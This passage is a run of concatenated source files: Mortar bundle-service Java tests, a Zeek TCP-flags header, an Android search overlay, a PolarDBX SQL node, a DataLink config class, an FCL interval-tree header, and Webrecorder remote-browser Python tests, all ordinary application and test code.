      // NOTE(review): incrementAndGet() returns >= 1 on the first call, so the
      // guard never fires (same pattern as the before-create variant).
      if (i.incrementAndGet() < 1) bundleService.register(this);
    }

    @Override public void onSave(Bundle outState) {
      throw new UnsupportedOperationException();
    }

    @Override public void onExitScope() {
      throw new UnsupportedOperationException();
    }
  });

  assertThat(i.get()).isEqualTo(1);
}
/**
 * Destroying the activity scope from within a bundler's onLoad must be
 * tolerated: loading stops (the counter never passes 3) and every registered
 * bundler still receives onExitScope.
 */
@Test public void handleDestroyFromEarlyLoad() {
  final AtomicInteger loads = new AtomicInteger(0);
  final AtomicInteger destroys = new AtomicInteger(0);

  class Destroyer implements Bundler {
    @Override public String getMortarBundleKey() {
      return "k";
    }

    @Override public void onEnterScope(MortarScope scope) {
    }

    @Override public void onLoad(Bundle savedInstanceState) {
      // The third load overall tears down the entire activity scope.
      if (loads.incrementAndGet() > 2) {
        activityScope.destroy();
      }
    }

    @Override public void onSave(Bundle outState) {
      throw new UnsupportedOperationException();
    }

    @Override public void onExitScope() {
      destroys.incrementAndGet();
    }
  }

  BundleService bundleService = getBundleService(activityScope);
  bundleService.register(new Destroyer());
  bundleService.register(new Destroyer());

  Bundle b = new Bundle();
  getBundleServiceRunner(activityScope).onCreate(b);

  // Loads stop at 3 once destroy runs; both bundlers were torn down.
  assertThat(loads.get()).isEqualTo(3);
  assertThat(destroys.get()).isEqualTo(2);
}
/**
 * Destroying the activity scope from within onSave: the first bundler's
 * onSave kills the scope, so the second bundler is never saved (saves == 1),
 * but both still receive onExitScope (destroys == 2).
 */
@Test public void handlesDestroyFromOnSave() {
  final AtomicInteger saves = new AtomicInteger(0);
  final AtomicInteger destroys = new AtomicInteger(0);

  class Destroyer implements Bundler {
    @Override public String getMortarBundleKey() {
      return "k";
    }

    @Override public void onEnterScope(MortarScope scope) {
    }

    @Override public void onLoad(Bundle savedInstanceState) {
    }

    @Override public void onSave(Bundle outState) {
      saves.incrementAndGet();
      // Tear down the whole scope mid-save.
      activityScope.destroy();
    }

    @Override public void onExitScope() {
      destroys.incrementAndGet();
    }
  }

  BundleService bundleService = getBundleService(activityScope);
  bundleService.register(new Destroyer());
  bundleService.register(new Destroyer());

  Bundle b = new Bundle();
  BundleServiceRunner bundleServiceRunner = getBundleServiceRunner(activityScope);
  bundleServiceRunner.onCreate(b);
  bundleServiceRunner.onSaveInstanceState(b);

  assertThat(destroys.get()).isEqualTo(2);
  assertThat(saves.get()).isEqualTo(1);
}
/**
 * A bundler registered in a child scope after onCreate must still receive the
 * state previously saved for it: save, simulate process death via
 * newProcess(), re-create from the same Bundle, and verify the child's flag
 * is restored.
 */
@Test public void deliversStateToBundlerWhenRegisterAfterOnCreate() {
  // Persists a boolean flag and reports whether it was restored.
  class SavesAndRestores extends MyBundler {
    SavesAndRestores() {
      super("sNr");
    }

    boolean restored;

    @Override public void onLoad(Bundle savedInstanceState) {
      super.onLoad(savedInstanceState);
      restored = savedInstanceState != null && savedInstanceState.getBoolean("fred");
    }

    @Override public void onSave(Bundle outState) {
      super.onSave(outState);
      outState.putBoolean("fred", true);
    }
  }

  // Registers its SavesAndRestores child in a freshly built child scope.
  class Top extends MyBundler {
    Top() {
      super("top");
    }

    final SavesAndRestores child = new SavesAndRestores();

    @Override public void onLoad(Bundle savedInstanceState) {
      super.onLoad(savedInstanceState);
      MortarScope childScope = activityScope.buildChild().build("child");
      getBundleService(childScope).register(child);
    }
  }

  Top originalTop = new Top();
  getBundleService(activityScope).register(originalTop);
  // Nothing was ever saved, so nothing to restore yet.
  assertThat(originalTop.child.restored).isFalse();

  Bundle bundle = new Bundle();
  getBundleServiceRunner(activityScope).onSaveInstanceState(bundle);

  newProcess();
  getBundleServiceRunner(activityScope).onCreate(bundle);

  Top newTop = new Top();
  getBundleService(activityScope).register(newTop);
  assertThat(newTop.child.restored).isTrue();
}
/** <a href="https://github.com/square/mortar/issues/46">Issue 46</a> */
@Test public void registerWithDescendantScopesCreatedDuringParentOnCreateGetOnlyOneOnLoadCall() {
  final MyBundler childBundler = new MyBundler("child");
  final MyBundler grandChildBundler = new MyBundler("grandChild");

  // Only spawn the sub-scopes on the onCreate-driven load, not on the
  // immediate load that happens at registration time.
  final AtomicBoolean spawnSubScope = new AtomicBoolean(false);

  getBundleService(activityScope).register(new MyBundler("outer") {
    @Override public void onLoad(Bundle savedInstanceState) {
      if (spawnSubScope.get()) {
        MortarScope childScope = activityScope.buildChild().build("child scope");
        getBundleService(childScope).register(childBundler);
        // 1. We're in the middle of loading, so the usual register > load call doesn't happen.
        assertThat(childBundler.loaded).isFalse();

        MortarScope grandchildScope = childScope.buildChild().build("grandchild scope");
        getBundleService(grandchildScope).register(grandChildBundler);
        assertThat(grandChildBundler.loaded).isFalse();
      }
    }
  });

  spawnSubScope.set(true);
  getBundleServiceRunner(activityScope).onCreate(null);

  // 2. But load is called before the onCreate chain ends.
  assertThat(childBundler.loaded).isTrue();
  assertThat(grandChildBundler.loaded).isTrue();
}
/**
 * Happened during first naive fix of
 * <a href="https://github.com/square/mortar/issues/46">Issue 46</a>.
 * Child scopes spun up during a parent's onLoad must not be left flagged as
 * "loading", or the subsequent save pass would throw.
 */
@Test public void descendantScopesCreatedDuringParentOnLoadAreNotStuckInLoadingMode() {
  getBundleService(activityScope).register(new MyBundler("outer") {
    @Override public void onLoad(Bundle savedInstanceState) {
      MortarScope child = activityScope.buildChild().build("subscope");
      child.buildChild().build("subsubscope");
    }
  });

  getBundleServiceRunner(activityScope).onSaveInstanceState(new Bundle());
  // No crash? Victoire!
}
/**
 * https://github.com/square/mortar/issues/77
 * A child bundler registered during the parent's onLoad must not load
 * re-entrantly; its load is deferred until the parent's finishes.
 */
@Test public void childCreatedDuringMyLoadDoesLoadingAfterMe() {
  getBundleServiceRunner(activityScope).onCreate(null);
  final MyBundler childBundler = new MyBundler("childBundler");

  getBundleService(activityScope).register(new MyBundler("root") {
    @Override public void onLoad(Bundle savedInstanceState) {
      super.onLoad(savedInstanceState);

      MortarScope childScope = activityScope.buildChild().build("childScope");
      getBundleService(childScope).register(childBundler);
      // Deferred: not loaded while the parent is still inside onLoad.
      assertThat(childBundler.loaded).isFalse();
    }
  });

  assertThat(childBundler.loaded).isTrue();
}
/**
 * https://github.com/square/mortar/issues/77
 * Load ordering across scopes: bundlers on the parent (activity) scope load
 * before bundlers registered in child scopes, regardless of registration
 * order during the parent's onLoad.
 */
@Test public void bundlersInChildScopesLoadAfterBundlersOnParent() {
  final List<Bundler> loadingOrder = new ArrayList<>();

  // rootBundler#onLoad creates a child scope and registers childBundler on it,
  // and after that registers a serviceBundler on the higher level
  // activity scope. The service must receive onLoad before the child does.

  getBundleServiceRunner(activityScope).onCreate(null);
  final MyBundler serviceOnActivityScope = new MyBundler("service") {
    @Override public void onLoad(Bundle savedInstanceState) {
      super.onLoad(savedInstanceState);
      loadingOrder.add(this);
    }
  };

  final MyBundler childBundler = new MyBundler("childBundler") {
    @Override public void onLoad(Bundle savedInstanceState) {
      super.onLoad(savedInstanceState);
      loadingOrder.add(this);
    }
  };

  MyBundler rootBundler = new MyBundler("root") {
    @Override public void onLoad(Bundle savedInstanceState) {
      loadingOrder.add(this);

      MortarScope childScope = activityScope.buildChild().build("childScope");

      getBundleService(childScope).register(childBundler);
      getBundleService(activityScope).register(serviceOnActivityScope);
    }
  };
  getBundleService(activityScope).register(rootBundler);

  // root first, then the late-registered activity-scope service, child last.
  assertThat(loadingOrder.size()).isEqualTo(3);
  assertThat(loadingOrder.get(0)).isSameAs(rootBundler);
  assertThat(loadingOrder.get(1)).isSameAs(serviceOnActivityScope);
  assertThat(loadingOrder.get(2)).isSameAs(childBundler);
}
/** https://github.com/square/mortar/issues/131 */
@Test public void destroyingWhileSaving() {
  final MortarScope[] currentScreen = new MortarScope[] { null };

  // NOTE(review): this swapper scope is named "screenOne", the same as the
  // child scope built below (different parents, so no collision) -- possibly
  // a copy-paste; confirm the intended name.
  MortarScope screenSwapperScope = activityScope.buildChild().build("screenOne");
  getBundleService(screenSwapperScope).register(new MyBundler("screenSwapper") {
    @Override public void onSave(Bundle outState) {
      // Destroy the currently showing screen in the middle of the save pass;
      // the save must survive this.
      currentScreen[0].destroy();
    }
  });

  final MortarScope screenOneScope = screenSwapperScope.buildChild().build("screenOne");
  getBundleService(screenOneScope).register(new MyBundler("bundlerOne"));
  currentScreen[0] = screenOneScope;

  final MortarScope screenTwoScope = screenSwapperScope.buildChild().build("screenTwo");
  getBundleService(screenTwoScope).register(new MyBundler("bundlerTwo"));

  // No crash expected.
  getBundleServiceRunner(activityScope).onSaveInstanceState(new Bundle());
}
// Make sure that when a scope dies, a new scope with the same name doesn't
// accidentally receive the old one's bundle.
@Test public void endScopeEndBundle() {
  MyBundler fooBundler = new MyBundler("fooBundler") {
    @Override public void onLoad(Bundle savedInstanceState) {
      // Both registrations in this test expect a fresh (null) bundle.
      assertThat(savedInstanceState).isNull();
    }

    @Override public void onSave(Bundle outState) {
      outState.putString("baz", "bang");
    }
  };

  // First visit to the foo screen, bundle will be null.
  MortarScope fooScope = activityScope.buildChild().build("fooScope");
  getBundleService(fooScope).register(fooBundler);

  // Android saves state
  Bundle state = new Bundle();
  getBundleServiceRunner(activityScope).onSaveInstanceState(state);

  // We leave the foo screen.
  fooScope.destroy();

  // And now we come back to it. New instance's onLoad should also get a null bundle.
  fooScope = activityScope.buildChild().build("fooScope");
  getBundleService(fooScope).register(fooBundler);
}
/**
 * Minimal stand-in for an Activity: wires up the runner, registers a root
 * bundler on the activity scope and a child bundler in a "child" sub-scope.
 */
class FauxActivity {
  final MyBundler rootBundler = new MyBundler("core");

  MortarScope childScope;
  MyBundler childBundler = new MyBundler("child");

  /** Mimics Activity#onCreate. */
  void create(Bundle bundle) {
    getBundleServiceRunner(activityScope).onCreate(bundle);
    getBundleService(activityScope).register(rootBundler);
    childScope = activityScope.buildChild().build("child");
    getBundleService(childScope).register(childBundler);
  }
}
/** Simulate a new process by creating brand new scope instances. */
private void newProcess() {
  newProcess("activity");
}
/** Rebuilds the scope hierarchy from scratch, as if the process had died. */
private void newProcess(String activityScopeName) {
  // NOTE(review): the parameter names the ROOT scope, while the activity
  // child scope is always built as "activity" -- confirm that is intended.
  MortarScope root = MortarScope.buildRootScope().build(activityScopeName);
  activityScope = root.buildChild()
      .withService(BundleServiceRunner.SERVICE_NAME, new BundleServiceRunner())
      .build("activity");
}
/**
 * Builds a mock Context whose getSystemService() delegates to the given
 * scope's service lookup, returning null for services the scope lacks.
 */
private static Context mockContext(MortarScope root) {
  final MortarScope scope = root;
  Context appContext = mock(Context.class);
  when(appContext.getSystemService(anyString())).thenAnswer(new Answer<Object>() {
    @Override public Object answer(InvocationOnMock invocation) throws Throwable {
      String name = (String) invocation.getArguments()[0];
      return scope.hasService(name) ? scope.getService(name) : null;
    }
  });
  return appContext;
}
/**
 * Recording Bundler used throughout these tests: remembers every lifecycle
 * callback it receives so tests can assert on ordering and payloads.
 */
private static class MyBundler implements Bundler {
  final String name;

  // Scope handed to onEnterScope, if any.
  MortarScope registered;
  // Lifecycle bookkeeping inspected by the tests.
  boolean loaded;
  Bundle lastLoaded;
  Bundle lastSaved;
  boolean destroyed;

  public MyBundler(String name) {
    this.name = name;
  }

  /** Clears recorded state so the same instance can observe another cycle. */
  void reset() {
    lastSaved = lastLoaded = null;
    loaded = destroyed = false;
  }

  @Override public String getMortarBundleKey() {
    return name;
  }

  @Override public void onEnterScope(MortarScope scope) {
    this.registered = scope;
  }

  @Override public void onLoad(Bundle savedInstanceState) {
    loaded = true;
    lastLoaded = savedInstanceState;
    if (savedInstanceState != null) {
      // Any restored bundle must be the one this bundler saved (keyed below).
      assertThat(savedInstanceState.get("key")).isEqualTo(name);
    }
  }

  @Override public void onSave(Bundle outState) {
    lastSaved = outState;
    outState.putString("key", name);
  }

  @Override public void onExitScope() {
    destroyed = true;
  }
}
}
| 7,783 |
2,181 | #pragma once
// This needs to remain the first include in this file, or some defines aren't
// set correctly when netinet/tcp.h is included and the CentOS 7 build breaks.
// clang-format off
#include "zeek/net_util.h"
#include <netinet/tcp.h>
#include <sys/types.h>
#include <string>
// clang-format on
namespace zeek::analyzer::tcp
{
// Convenience wrapper around the control-flag byte of a TCP header.
// Provides named accessors for the individual flag bits and a compact
// string rendering (e.g. "SA" for SYN+ACK).
class TCP_Flags
    {
public:
    // Capture the flag byte from a parsed TCP header.
    TCP_Flags(const struct tcphdr* tp) { flags = tp->th_flags; }
    // Default: no flags set.
    TCP_Flags() { flags = 0; }

    bool SYN() const { return (flags & TH_SYN) != 0; }
    bool FIN() const { return (flags & TH_FIN) != 0; }
    bool RST() const { return (flags & TH_RST) != 0; }
    bool ACK() const { return (flags & TH_ACK) != 0; }
    bool URG() const { return (flags & TH_URG) != 0; }
    bool PUSH() const { return (flags & TH_PUSH) != 0; }

    // One letter per set flag, in the fixed order S, F, R, A, P, U.
    std::string AsString() const;

protected:
    u_char flags;
    };

inline std::string TCP_Flags::AsString() const
    {
    std::string rendered;
    rendered.reserve(6); // at most one letter per flag

    if ( SYN() )
        rendered += 'S';
    if ( FIN() )
        rendered += 'F';
    if ( RST() )
        rendered += 'R';
    if ( ACK() )
        rendered += 'A';
    if ( PUSH() )
        rendered += 'P';
    if ( URG() )
        rendered += 'U';

    return rendered;
    }
} // namespace zeek::analyzer::tcp
| 468 |
726 | <reponame>xqgdmg/DavidNBA-master
package com.yuyh.library.view.list.indexablelistview;
import android.content.Context;
import android.graphics.Color;
import android.view.Gravity;
import android.widget.FrameLayout;
import android.widget.ProgressBar;
import android.widget.TextView;
/**
* 搜索部分 相关
* Created by YoKeyword on 16/3/25.
*/
/**
 * Overlay used by the indexable list's search feature: shows either an
 * indeterminate progress spinner (while searching) or a "no match" hint
 * (when the search came back empty), and hides itself entirely otherwise.
 * <p>
 * Created by YoKeyword on 16/3/25.
 */
public class SearchLayout extends FrameLayout {
    private ProgressBar mSearchProgressBar;
    private TextView mTvTip;

    public SearchLayout(Context context) {
        super(context);
        init(context);
    }

    private void init(Context context) {
        setBackgroundColor(Color.WHITE);

        int spinnerSize = IndexBar.dp2px(context, 20);

        // Centered spinner, offset from the top by its own size.
        mSearchProgressBar = new ProgressBar(context);
        LayoutParams progressParams = new LayoutParams(spinnerSize, spinnerSize);
        progressParams.gravity = Gravity.CENTER_HORIZONTAL;
        progressParams.topMargin = spinnerSize;

        // Centered "no match" hint with the same top offset.
        mTvTip = new TextView(context);
        LayoutParams tipParams =
                new LayoutParams(LayoutParams.WRAP_CONTENT, LayoutParams.WRAP_CONTENT);
        tipParams.gravity = Gravity.CENTER_HORIZONTAL;
        tipParams.topMargin = spinnerSize;
        mTvTip.setText("没有搜索到匹配内容");
        mTvTip.setTextSize(12f);
        mTvTip.setTextColor(Color.GRAY);

        // Tip first, spinner on top; hidden until a search starts.
        addView(mTvTip, tipParams);
        addView(mSearchProgressBar, progressParams);
        setVisibility(GONE);
    }

    /** Shows the layout with the spinner; the tip (if showing) is hidden. */
    void showProgress() {
        if (getVisibility() != VISIBLE) setVisibility(VISIBLE);
        if (mSearchProgressBar.getVisibility() != VISIBLE) {
            mSearchProgressBar.setVisibility(VISIBLE);
        }
        if (mTvTip.getVisibility() == VISIBLE) mTvTip.setVisibility(INVISIBLE);
    }

    /** Shows the layout with the "no match" tip; the spinner is hidden. */
    void showTip() {
        if (getVisibility() != VISIBLE) setVisibility(VISIBLE);
        if (mSearchProgressBar.getVisibility() == VISIBLE) {
            mSearchProgressBar.setVisibility(INVISIBLE);
        }
        if (mTvTip.getVisibility() != VISIBLE) mTvTip.setVisibility(VISIBLE);
    }

    /** Hides the whole overlay. */
    void hide() {
        if (getVisibility() == VISIBLE) setVisibility(GONE);
    }

    /** True only when the overlay is showing and the spinner is visible. */
    boolean isProgressVisible() {
        return getVisibility() == VISIBLE
                && mSearchProgressBar.getVisibility() == VISIBLE;
    }
}
| 1,073 |
480 | <reponame>weicao/galaxysql<filename>polardbx-calcite/src/main/java/org/apache/calcite/sql/SqlAlterTableGroupRenamePartition.java<gh_stars>100-1000
/*
* Copyright [2013-2021], Alibaba Group Holding Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.calcite.sql;
import com.alibaba.polardbx.common.utils.Pair;
import org.apache.calcite.sql.parser.SqlParserPos;
import java.util.List;
/**
 * Parse-tree node for the {@code ALTER TABLEGROUP ... RENAME PARTITION}
 * specification, carrying the list of (old name, new name) pairs.
 * <p>
 * Created by luoyanxin.
 *
 * @author luoyanxin
 */
public class SqlAlterTableGroupRenamePartition extends SqlAlterSpecification {

    private static final SqlOperator OPERATOR =
        new SqlSpecialOperator("RENAME PARTITION", SqlKind.ALTER_TABLEGROUP_RENAME_PARTITION);

    /** Pairs of (old partition name, new partition name). */
    private final List<Pair<String, String>> changePartitionsPair;
    /** The enclosing ALTER TABLEGROUP statement; set after construction. */
    private SqlAlterTableGroup parent;

    public SqlAlterTableGroupRenamePartition(SqlParserPos pos, List<Pair<String, String>> changePartitionsPair) {
        super(pos);
        this.changePartitionsPair = changePartitionsPair;
    }

    @Override
    public SqlOperator getOperator() {
        return OPERATOR;
    }

    public void setParent(SqlAlterTableGroup parent) {
        this.parent = parent;
    }

    // NOTE(review): returns null rather than an empty list; callers that
    // iterate the operand list without a null check would NPE -- confirm this
    // matches how the surrounding code treats operand lists.
    @Override
    public List<SqlNode> getOperandList() {
        return null;
    }

    public List<Pair<String, String>> getChangePartitionsPair() {
        return changePartitionsPair;
    }

    public SqlAlterTableGroup getParent() {
        return parent;
    }
}
| 681 |
971 | package com.ucar.datalink.manager.core.coordinator;
/**
* Created by lubiao on 2016/12/1.
*/
/**
 * Mutable holder for group-session timeout bounds, in milliseconds.
 * Created by lubiao on 2016/12/1.
 */
public class GroupConfig {

    /** Lower bound on a group member's session timeout (ms). */
    private int groupMinSessionTimeoutMs;
    /** Upper bound on a group member's session timeout (ms). */
    private int groupMaxSessionTimeoutMs;

    public GroupConfig(int groupMinSessionTimeoutMs, int groupMaxSessionTimeoutMs) {
        this.groupMinSessionTimeoutMs = groupMinSessionTimeoutMs;
        this.groupMaxSessionTimeoutMs = groupMaxSessionTimeoutMs;
    }

    public int getGroupMinSessionTimeoutMs() {
        return groupMinSessionTimeoutMs;
    }

    public int getGroupMaxSessionTimeoutMs() {
        return groupMaxSessionTimeoutMs;
    }

    public void setGroupMinSessionTimeoutMs(int groupMinSessionTimeoutMs) {
        this.groupMinSessionTimeoutMs = groupMinSessionTimeoutMs;
    }

    public void setGroupMaxSessionTimeoutMs(int groupMaxSessionTimeoutMs) {
        this.groupMaxSessionTimeoutMs = groupMaxSessionTimeoutMs;
    }
}
| 305 |
921 | /*
* Software License Agreement (BSD License)
*
* Copyright (c) 2011-2014, <NAME>, Inc.
* Copyright (c) 2014-2016, Open Source Robotics Foundation
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials provided
* with the distribution.
* * Neither the name of Open Source Robotics Foundation nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
/** @author <NAME> */
#ifndef FCL_INTERVAL_TREE_H
#define FCL_INTERVAL_TREE_H
#include <deque>
#include <limits>
#include <cstdlib>
#include <iostream>
#include "fcl/broadphase/detail/interval_tree_node.h"
namespace fcl {
namespace detail {
/// @brief Class describes the information needed when we take the
/// right branch in searching for intervals but possibly come back
/// and check the left branch as well.
template <typename S>
struct FCL_EXPORT it_recursion_node
{
public:
  /// Node at which the pending traversal resumes.
  IntervalTreeNode<S>* start_node;

  /// Index of this entry's parent on the recursion stack.
  unsigned int parent_index;

  /// True if the right branch still needs to be examined.
  bool try_right_branch;
};
using it_recursion_nodef = it_recursion_node<float>;
using it_recursion_noded = it_recursion_node<double>;
extern template
struct it_recursion_node<double>;
/// @brief Interval tree
///
/// Binary search tree of SimpleInterval objects with rotation/fixup
/// rebalancing, supporting range queries via query().
template <typename S>
class FCL_EXPORT IntervalTree
{
public:
  IntervalTree();

  ~IntervalTree();

  /// @brief Print the whole interval tree
  void print() const;

  /// @brief Delete one node of the interval tree
  SimpleInterval<S>* deleteNode(IntervalTreeNode<S>* node);

  /// @brief delete node stored a given interval
  void deleteNode(SimpleInterval<S>* ivl);

  /// @brief Insert one node of the interval tree
  IntervalTreeNode<S>* insert(SimpleInterval<S>* new_interval);

  /// @brief get the predecessor of a given node
  IntervalTreeNode<S>* getPredecessor(IntervalTreeNode<S>* node) const;

  /// @brief Get the successor of a given node
  IntervalTreeNode<S>* getSuccessor(IntervalTreeNode<S>* node) const;

  /// @brief Return result for a given query: all stored intervals
  /// overlapping [low, high]
  std::deque<SimpleInterval<S>*> query(S low, S high);

protected:
  /// Root of the tree.
  IntervalTreeNode<S>* root;

  /// NOTE(review): presumably a shared sentinel standing in for null
  /// children/parents -- confirm in interval_tree-inl.h.
  IntervalTreeNode<S>* nil;

  /// @brief left rotation of tree node
  void leftRotate(IntervalTreeNode<S>* node);

  /// @brief right rotation of tree node
  void rightRotate(IntervalTreeNode<S>* node);

  /// @brief Inserts node into the tree as if it were a regular binary tree
  void recursiveInsert(IntervalTreeNode<S>* node);

  /// @brief recursively print a subtree
  void recursivePrint(IntervalTreeNode<S>* node) const;

  /// @brief recursively find the node corresponding to the interval
  IntervalTreeNode<S>* recursiveSearch(IntervalTreeNode<S>* node, SimpleInterval<S>* ivl) const;

  /// @brief Travels up to the root fixing the max_high fields after an insertion or deletion
  void fixupMaxHigh(IntervalTreeNode<S>* node);

  void deleteFixup(IntervalTreeNode<S>* node);

private:
  // Explicit stack used by query() in place of recursion (see
  // it_recursion_node above).
  unsigned int recursion_node_stack_size;
  it_recursion_node<S>* recursion_node_stack;
  unsigned int current_parent;
  unsigned int recursion_node_stack_top;
};
using IntervalTreef = IntervalTree<float>;
using IntervalTreed = IntervalTree<double>;
} // namespace detail
} // namespace fcl
#include "fcl/broadphase/detail/interval_tree-inl.h"
#endif
| 1,421 |
1,217 | <gh_stars>1000+
from .testutils import FullStackTests, FakeStrictRedis
import os
import json
from mock import patch
from webrecorder.utils import today_str
from webrecorder.models.stats import Stats
from webrecorder.browsermanager import BrowserManager
# ============================================================================
def mock_load_all_browsers(self):
    """Replacement for BrowserManager.load_all_browsers: installs a fixed,
    two-entry browser catalog instead of querying real browser containers.
    """
    supported = [('chrome:60', 'Chrome'), ('firefox:53', 'Firefox')]
    self.browsers = {browser_id: {'name': name} for browser_id, name in supported}
def mock_new_browser(key):
    """Build a replacement for BrowserManager._api_new_browser that records
    the request data into the fake browser redis under ``key`` instead of
    contacting a real browser container.  Always issues the fixed request id
    'ABCDEFG'.
    """
    def _fake_api_new_browser(self, url, data):
        reqid = 'ABCDEFG'
        data['reqid'] = reqid
        TestBrowserInit.browser_redis.hmset(key, data)
        return {'id': data['browser'], 'reqid': reqid}

    return _fake_api_new_browser
def mock_reqid_to_user_params(self, reqid):
    # Ignores reqid entirely: always returns the canned 'up:test' hash.
    return TestBrowserInit.browser_redis.hgetall('up:test')
def mock_browser_sesh_id(self, reqid):
    # Returns None, patched over BrowserManager.browser_sesh_id for the whole
    # test class so no real browser session lookup occurs.
    return
# ============================================================================
@patch('webrecorder.browsermanager.BrowserManager.browser_sesh_id', mock_browser_sesh_id)
class TestBrowserInit(FullStackTests):
    """Full-stack tests for the /api/v1/create_remote_browser endpoint and
    browser-mediated recording, with the browser manager's external calls
    replaced by mocks.  Tests run in order and share class-level state.
    """

    # Recording name created by test_create_coll_and_rec, reused by later tests.
    rec_name = None
    # Fake redis instance backing the remote-browser state (up:* hashes).
    browser_redis = None

    @classmethod
    def setup_class(cls):
        # Patch the browser catalog and enable remote browsers before the app
        # stack comes up.
        with patch('webrecorder.browsermanager.BrowserManager.load_all_browsers', mock_load_all_browsers):
            os.environ['NO_REMOTE_BROWSERS'] = '0'

            super(TestBrowserInit, cls).setup_class()

        cls.browser_redis = FakeStrictRedis.from_url(os.environ['REDIS_BROWSER_URL'], decode_responses=True)

    @classmethod
    def teardown_class(cls):
        os.environ.pop('NO_REMOTE_BROWSERS', '')
        BrowserManager.running = False
        super(TestBrowserInit, cls).teardown_class()

    def test_create_coll_and_rec(self):
        # Create a 'temp' collection plus a recording for the anonymous user;
        # remember the recording name for the rest of the class.
        res = self._anon_post('/api/v1/collections?user={user}', params={'title': 'temp'})

        res = self._anon_post('/api/v1/recordings?user={user}&coll=temp')

        assert self.testapp.cookies['__test_sesh'] != ''

        TestBrowserInit.rec_name = res.json['recording']['id']
        assert TestBrowserInit.rec_name

    def test_create_remote_browser_for_record(self):
        # Launch a browser in plain record mode and inspect the stored params.
        params = {
            'browser': 'chrome:60',
            'user': self.anon_user,
            'coll': 'temp',
            'rec': TestBrowserInit.rec_name,
            'url': 'http://example.com/',
            'mode': 'record'
        }

        with patch('webrecorder.browsermanager.BrowserManager._api_new_browser', mock_new_browser('up:test')):
            res = self.testapp.get('/api/v1/create_remote_browser', params=params)

        assert res.json == {
            'reqid': 'ABCDEFG',
            'browser': 'chrome:60',
            'browser_data': {'name': 'Chrome'},
            'inactive_time': 60,
            'timestamp': '',
            'url': 'http://example.com/',
        }

        res = self.browser_redis.hgetall('up:test')
        # Record mode: no timestamp, remote sources, or patch recording.
        assert res['timestamp'] == ''
        assert res['sources'] == ''
        assert res['inv_sources'] == ''
        assert res['patch_rec'] == ''
        assert res['type'] == 'record'

        assert set(res.keys()) == {
            'user', 'remote_ip',
            'ip', 'id', 'type',
            'coll', 'coll_name',
            'rec', 'patch_rec',
            'url', 'timestamp',
            'sources', 'inv_sources',
            'browser', 'browser_can_write',
            'reqid',
        }

    def test_create_browser_for_embed_patch(self):
        # extract:ia mode: /api/v1/new first creates the recording and the
        # patch recording, then the browser is launched against them.
        params = {
            'user': self.anon_user,
            'coll': 'temp',
            'url': 'http://geocities.com/',
            'timestamp': '1996',
            'mode': 'extract:ia',
            'browser': 'chrome:60',
            'reqid': 'ABCDEFG',
        }

        res = self.testapp.post_json('/api/v1/new', params=params)
        assert res.json['url']
        assert res.json['rec_name']
        assert res.json['patch_rec_name']

        params['rec'] = res.json['rec_name']
        params['patch_rec'] = res.json['patch_rec_name']

        with patch('webrecorder.browsermanager.BrowserManager._api_new_browser', mock_new_browser('up:test2')):
            res = self.testapp.get('/api/v1/create_remote_browser', params=params)

        assert res.json == {
            'reqid': 'ABCDEFG',
            'browser': 'chrome:60',
            'browser_data': {'name': 'Chrome'},
            'inactive_time': 60,
            'timestamp': '1996',
            'url': 'http://geocities.com/',
        }

        res = self.browser_redis.hgetall('up:test2')
        # Extract mode: timestamp and the 'ia' source/patch metadata are set.
        assert res['timestamp'] == '1996'
        assert res['sources'] == 'ia'
        assert res['inv_sources'] == 'ia'
        assert res['patch_rec'] != ''
        assert res['type'] == 'extract'

        assert set(res.keys()) == {
            'user', 'remote_ip',
            'ip', 'id', 'type',
            'coll', 'coll_name',
            'rec', 'patch_rec',
            'url', 'timestamp',
            'sources', 'inv_sources',
            'browser', 'browser_can_write',
            'reqid',
        }

    def test_create_browser_error_invalid_mode(self):
        # Unknown mode is rejected with 400 / 'invalid_mode'.
        params = {
            'user': self.anon_user,
            'coll': 'temp',
            'rec': TestBrowserInit.rec_name,
            'url': 'http://geocities.com/',
            'timestamp': '1996',
            'mode': 'foo',
            'browser': 'chrome:60',
        }

        with patch('webrecorder.browsermanager.BrowserManager._api_new_browser', mock_new_browser('up:test3')):
            res = self.testapp.get('/api/v1/create_remote_browser', params=params, status=400)

        assert res.json['error'] == 'invalid_mode'

    def test_create_browser_error_no_rec(self):
        # Record mode without an existing recording fails with 404.
        params = {
            'user': self.anon_user,
            'coll': 'temp',
            'url': 'http://geocities.com/',
            'mode': 'record',
            'browser': 'chrome:60',
        }

        with patch('webrecorder.browsermanager.BrowserManager._api_new_browser', mock_new_browser('up:test3')):
            res = self.testapp.get('/api/v1/create_remote_browser', params=params, status=404)

        assert res.json['error'] == 'no_such_recording'

    def test_browser_stats(self):
        # Four successful/attempted chrome:60 launches were counted above.
